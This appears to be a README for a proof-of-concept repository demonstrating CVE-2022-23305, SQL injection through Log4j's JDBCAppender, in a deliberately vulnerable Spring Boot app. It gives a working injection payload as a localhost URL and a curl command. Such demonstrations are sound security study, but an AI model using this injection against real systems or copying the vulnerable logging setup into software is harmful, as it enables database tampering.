/CVE-2022-23305_POC

CVE-2022-23305 Log4J JDBCAppender SQl injection POC

Primary LanguageJava

CVE-2022-23305 Log4j JDBCAppender sql injection POC

This is a very simple Spring Boot based application that demonstrates the CVE-2022-23305 vulnerability. It uses Apache Maven, Spring Boot, Spring MVC, and the H2 in-memory database to log one simple entry, taken as a URL query string parameter. Since Log4J is configured to use a JDBCAppender, it is vulnerable to SQL injection.

See src/main/java/poc/InjectionController.java for the logging statement.
See src/main/resource folder for all the configuration files.

You can run the application using Java and Maven by running "mvn clean spring-boot:run".
You can also run it as a Docker application such as:
 docker build --tag log4j-poc .
 docker run -p 8080:8080 log4j-poc

The app will be available at http://localhost:8080/.
To exploit the vulnerability, submit an injected sql statement as the parameter which is getting logged:
 "http://localhost:8080/?param=');insert into logs values(':("
The return will list the added log entries, containing one that was added by the sql injected into the parameter.
To do the same with curl use:
 curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('